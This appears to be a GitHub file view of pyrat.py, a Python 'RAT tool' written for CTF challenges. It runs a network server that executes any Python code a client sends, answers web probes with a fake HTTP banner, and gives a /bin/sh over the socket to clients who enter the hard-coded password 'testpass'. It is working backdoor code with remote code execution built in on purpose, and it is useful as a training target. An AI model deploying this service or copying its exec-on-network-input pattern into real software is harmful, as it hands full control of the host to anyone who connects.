-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathpyrat.py
202 lines (160 loc) · 5.24 KB
/
pyrat.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
# Made by [email protected]
# Pyrat.py is a "Python RAT tool" designed for use in CTF challenges
import socket
import sys
from io import StringIO
import datetime
import os
import multiprocessing
# Shared state for the admin check. Manager() starts a separate server
# process; objects created through it are proxies that other processes can use.
# NOTE(review): this runs at import time, outside the __main__ guard. Under the
# "spawn"/"forkserver" start methods child processes re-import this module -
# confirm that "fork" is the only start method this tool is run with.
manager = multiprocessing.Manager()
# List proxy holding str(client_socket) for every client that passed the
# password prompt in get_admin(); switch_case() consults it before dropping
# privileges.
admins = manager.list()
def handle_client(client_socket, client_address):
    """Serve a single client until it disconnects or any error occurs.

    Each chunk (at most 1024 bytes, decoded as UTF-8) is either answered with
    the fake HTTP banner, when it looks like an HTTP request, or stripped and
    forwarded to ``switch_case``. The socket is passed to ``remove_socket``
    once the loop ends, whatever the reason.

    Args:
        client_socket: Connected socket for this client.
        client_address: Peer address returned by ``accept()``; not used here.
    """

    def read_chunk():
        # One receive from the client, decoded to text.
        return client_socket.recv(1024).decode("utf-8")

    try:
        # iter() with a sentinel stops at the empty string that recv() yields
        # once the client has disconnected.
        for chunk in iter(read_chunk, ""):
            if not is_http(chunk):
                switch_case(client_socket, str(chunk).strip())
            else:
                send_data(client_socket, fake_http())
    except BaseException:
        # Deliberately best-effort: any failure simply ends this session.
        pass

    remove_socket(client_socket)
def switch_case(client_socket, data):
    """Route one stripped client message to its handler.

    ``admin`` starts the password prompt. Any other message first drops root
    privileges unless this socket is in the admin list, then either opens a
    shell (``shell``) or is executed as Python code.

    Args:
        client_socket: Connected socket of the client that sent the message.
        data: The received message with surrounding whitespace removed.
    """
    if data == 'admin':
        get_admin(client_socket)
        return

    # A client that has not been approved as admin must not keep running as root.
    running_as_root = os.getuid() == 0
    if running_as_root and str(client_socket) not in admins:
        change_uid()

    if data != 'shell':
        exec_python(client_socket, data)
        return

    shell(client_socket)
    remove_socket(client_socket)
def exec_python(client_socket, data):
    """Execute *data* as Python source and send its printed output to the client.

    The request is echoed to the server's stdout, then stdout is redirected
    into a buffer while the code runs. On success the buffer's contents are
    sent back; if anything raises an ``Exception``, the exception itself is
    sent instead. The stdout stream that was active on entry is always
    restored afterwards.

    Args:
        client_socket: Connected socket that receives the result.
        data: Source text received from the client.
    """
    # SECURITY: exec() on data read from the network is arbitrary code
    # execution. That is this tool's stated purpose, so it is kept, but it
    # must never be exposed outside a deliberately vulnerable lab setup.
    #
    # Restore exactly what was in place before, rather than forcing
    # sys.__stdout__, so an outer redirection (test capture, logging wrapper)
    # survives this call.
    previous_stdout = sys.stdout
    try:
        print(str(client_socket) + " : " + str(data))
        # Redirect stdout to capture the printed output
        captured_output = StringIO()
        sys.stdout = captured_output
        # Execute the received data as code. Local names are left unchanged
        # because exec() exposes this function's namespace to the code.
        exec(data)
        # Get the captured output
        exec_output = captured_output.getvalue()
        # Send the result back to the client
        send_data(client_socket, exec_output)
    except Exception as e:
        # Send the exception message back to the client
        send_data(client_socket, e)
    finally:
        sys.stdout = previous_stdout
def get_admin(client_socket):
    """Run the admin password prompt for *client_socket*.

    The prompt is only offered while the process still runs as uid 0;
    otherwise the client is told to reconnect. The client gets up to three
    attempts. On a match, ``str(client_socket)`` is appended to the shared
    ``admins`` list and a welcome message is sent.

    A failed receive is reported to the client and counts as a used attempt.
    An empty read (peer disconnected) ends the prompt immediately.

    Args:
        client_socket: Connected socket of the client asking for admin access.
    """
    if os.getuid() != 0:
        send_data(client_socket, "Start a fresh client to begin.")
        return

    # NOTE(review): hard-coded credential, kept as found; consider loading it
    # from configuration.
    password = 'testpass'

    for _ in range(3):
        # Ask for Password
        send_data(client_socket, "Password:")

        # Receive data from the client
        try:
            data = client_socket.recv(1024).decode("utf-8")
        except Exception as e:
            # Send the exception message back to the client. There is nothing
            # to compare, so move on instead of reading an unbound or stale
            # `data`.
            send_data(client_socket, e)
            continue

        if not data:
            # Peer closed the connection; further prompts are pointless.
            return

        if data.strip() == password:
            admins.append(str(client_socket))
            send_data(client_socket, 'Welcome Admin!!! Type "shell" to begin')
            break
def shell(client_socket):
    """Attach ``/bin/sh`` to the client's socket.

    File descriptors 0, 1 and 2 of this process are replaced with duplicates
    of the socket, then ``/bin/sh`` is spawned through ``pty``. Any
    ``Exception`` raised on the way is sent to the client.

    Args:
        client_socket: Connected socket that becomes the shell's terminal.
    """
    try:
        import pty

        # stdin, stdout and stderr all point at the client connection.
        for std_fd in (0, 1, 2):
            os.dup2(client_socket.fileno(), std_fd)
        pty.spawn("/bin/sh")
    except Exception as err:
        send_data(client_socket, err)
def send_data(client_socket, data):
    """Send ``str(data)`` followed by a newline to the client, UTF-8 encoded.

    Delivery is best-effort: if building or sending the message fails, the
    socket is handed to ``remove_socket`` and the error is not re-raised.

    Args:
        client_socket: Connected socket to write to.
        data: Any object; its ``str()`` form is what gets sent.
    """
    try:
        client_socket.sendall((str(data) + '\n').encode("utf-8"))
    except Exception:
        # Catch Exception rather than everything, so KeyboardInterrupt and
        # SystemExit are not mistaken for a broken connection.
        remove_socket(client_socket)
def start_server(host, port):
    """Listen on ``host:port`` and handle every connection in its own process.

    Runs until interrupted. The listening socket is closed when the loop is
    left for any reason.

    Args:
        host: Interface address to bind to.
        port: TCP port to listen on.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server_socket:
        # Allow an immediate restart while old connections linger in TIME_WAIT.
        server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server_socket.bind((host, port))
        server_socket.listen(5)
        print(f"Server listening on {host}:{port}...")
        while True:
            client_socket, client_address = server_socket.accept()
            # Start a new process to handle the client
            p = multiprocessing.Process(target=handle_client, args=(client_socket, client_address))
            try:
                p.start()
            finally:
                # The worker owns its own handle to the connection. Closing
                # the parent's copy stops descriptors piling up and lets the
                # client see EOF as soon as the worker closes its side.
                client_socket.close()
def remove_socket(client_socket):
    """Close *client_socket* and drop it from the shared admin list.

    Safe to call more than once for the same socket. Failures while updating
    the admin list are ignored, so cleanup never raises because of it.

    Args:
        client_socket: Socket to close; its ``str()`` form is the admin-list key.
    """
    # A socket's string form changes once it is closed, so take the key first;
    # computed after close() it would never match the entry stored by
    # get_admin().
    admin_key = str(client_socket)
    client_socket.close()
    try:
        # Work on the shared list itself. Rebinding the global to a local copy
        # would leave the entry visible to every other process.
        if admin_key in admins:
            admins.remove(admin_key)
    except Exception:
        # Best-effort: the shared list may be unreachable during shutdown.
        pass
def is_http(data):
    """Return True when *data* looks like an HTTP request.

    The check is a plain substring test: the text must contain both ``HTTP``
    and ``Host:``.

    Args:
        data: Decoded text received from a client.

    Returns:
        bool: True if both markers are present, otherwise False.
    """
    return 'HTTP' in data and 'Host:' in data
def fake_http():
    """Build a fake Python ``SimpleHTTP`` response telling the client to retry.

    The result is a status line, four headers, a blank separator line and a
    one-line body, using ``\\n`` line endings. ``Content-Length`` is computed
    from the body so it cannot drift from the text, and the date carries the
    local time-zone name.

    Returns:
        str: The full response text, or just ``'HTTP/1.0 200 OK'`` if building
        it fails.
    """
    try:
        body = "Try a more basic connection!\n"
        # astimezone() attaches the local zone, so %Z renders a name instead
        # of the empty string a naive datetime would give.
        current_datetime = datetime.datetime.now().astimezone()
        formatted_datetime = current_datetime.strftime("%a %b %d %H:%M:%S %Z %Y")
        header_lines = [
            "HTTP/1.0 200 OK",
            "Server: SimpleHTTP/0.6 Python/3.11.2",
            "Date: {date}".format(date=formatted_datetime),
            "Content-type: text/html; charset=utf-8",
            "Content-Length: {size}".format(size=len(body.encode("utf-8"))),
        ]
        # Headers and body must be separated by an empty line.
        return "\n".join(header_lines) + "\n\n" + body
    except Exception:
        return 'HTTP/1.0 200 OK'
def change_uid():
    """Drop root privileges for the current process.

    Does nothing unless the process runs as uid 0. Otherwise group 0 is taken
    out of the supplementary groups, then the group id and the user id are
    both set to 33, in that order.
    """
    if os.getuid() != 0:
        return

    # Make python code execution run as user 33 (www-data)
    target_id = 33
    supplementary = os.getgroups()
    if 0 in supplementary:
        supplementary.remove(0)
    os.setgroups(supplementary)
    os.setgid(target_id)
    os.setuid(target_id)
# Script entry point: serve until interrupted from the keyboard.
if __name__ == "__main__":
    # Replace with your desired IP address and port number
    host, port = "0.0.0.0", 8000
    try:
        start_server(host, port)
    except KeyboardInterrupt:
        print('Shutting Down...')
        sys.exit(1)